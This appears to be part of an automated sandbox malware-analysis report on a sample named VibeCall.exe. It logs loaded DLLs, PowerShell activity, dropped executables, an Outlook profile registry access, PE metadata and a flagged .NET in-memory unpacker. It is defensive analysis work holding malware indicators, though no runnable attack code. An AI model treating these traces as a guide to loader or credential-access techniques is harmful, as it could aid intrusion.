                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wshunix.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\Documents\aisolution_vibecall_a.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Documents\aisolution_vibecall_a.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: cscapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\VibeCall.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook
                      Source: VibeCall.exeStatic PE information: certificate valid
                      Source: VibeCall.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: VibeCall.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: VibeCall.exeStatic file information: File size 71217328 > 1048576
                      Source: VibeCall.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x61ac00
                      Source: VibeCall.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17ca00
                      Source: VibeCall.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x172800
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: VibeCall.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wkernel32.pdb source: contry_solution_vibecall_e.exe, 0000000D.00000003.2523616004.0000000003BE0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2523508029.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: contry_solution_vibecall_e.exe, 0000000D.00000003.2523942367.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2524137617.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp, soundsolution_vibecall_c.exe, 0000000E.00000003.2581937101.0000000004530000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: contry_solution_vibecall_e.exe, 0000000D.00000003.2522441242.0000000003CB0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2522244799.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: contry_solution_vibecall_e.exe, 0000000D.00000003.2523064240.0000000003C60000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2522855561.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: contry_solution_vibecall_e.exe, 0000000D.00000003.2522441242.0000000003CB0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2522244799.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: contry_solution_vibecall_e.exe, 0000000D.00000003.2523064240.0000000003C60000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2522855561.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: VibeCall.exe, 00000000.00000000.1767166805.00007FF6F517D000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: contry_solution_vibecall_e.exe, 0000000D.00000003.2523942367.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2524137617.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp, soundsolution_vibecall_c.exe, 0000000E.00000003.2581937101.0000000004530000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: contry_solution_vibecall_e.exe, 0000000D.00000003.2523616004.0000000003BE0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000D.00000003.2523508029.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: VibeCall.exe, 00000000.00000000.1767413045.00007FF6F5382000.00000002.00000001.01000000.00000003.sdmp
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: 33.3.OpenWith.exe.21cf0bfd970.5.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 33.3.OpenWith.exe.21cf0bfd970.5.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: VibeCall.exeStatic PE information: section name: .CLR_UEF
                      Source: VibeCall.exeStatic PE information: section name: .didat
                      Source: VibeCall.exeStatic PE information: section name: Section
                      Source: VibeCall.exeStatic PE information: section name: _RDATA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B55D2A5 pushad ; iretd 2_2_00007FFD9B55D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B6700AD pushad ; iretd 2_2_00007FFD9B6700C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B742316 push 8B485F92h; iretd 2_2_00007FFD9B74231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B6619BA pushad ; ret 4_2_00007FFD9B6619C9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B6600AD pushad ; iretd 4_2_00007FFD9B6600C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B665875 push eax; ret 4_2_00007FFD9B665899
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_017819B4 push ecx; ret 13_3_017819C7
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_03040F6A push eax; ret 13_3_03040F75
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_03043F89 push edi; iretd 13_3_03043F96
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_03043FD4 push ss; retf 13_3_03043FF5
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_0304525D push es; ret 13_3_03045264
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_03044D5E push esi; ret 13_3_03044D69
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_030421DC push eax; ret 13_3_030421DD
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_03042C39 push ecx; ret 13_3_03042C59
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_030428EC push edi; ret 13_3_030428F8
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_030410F9 push FFFFFF82h; iretd 13_3_030410FB
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_030444F9 push edx; retf 13_3_030444FC
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_2_03044D5E push esi; ret 13_2_03044D69
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_2_03040F6A push eax; ret 13_2_03040F75
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_2_03043F89 push edi; iretd 13_2_03043F96
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_2_03043FD4 push ss; retf 13_2_03043FF5
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_2_030421DC push eax; ret 13_2_030421DD
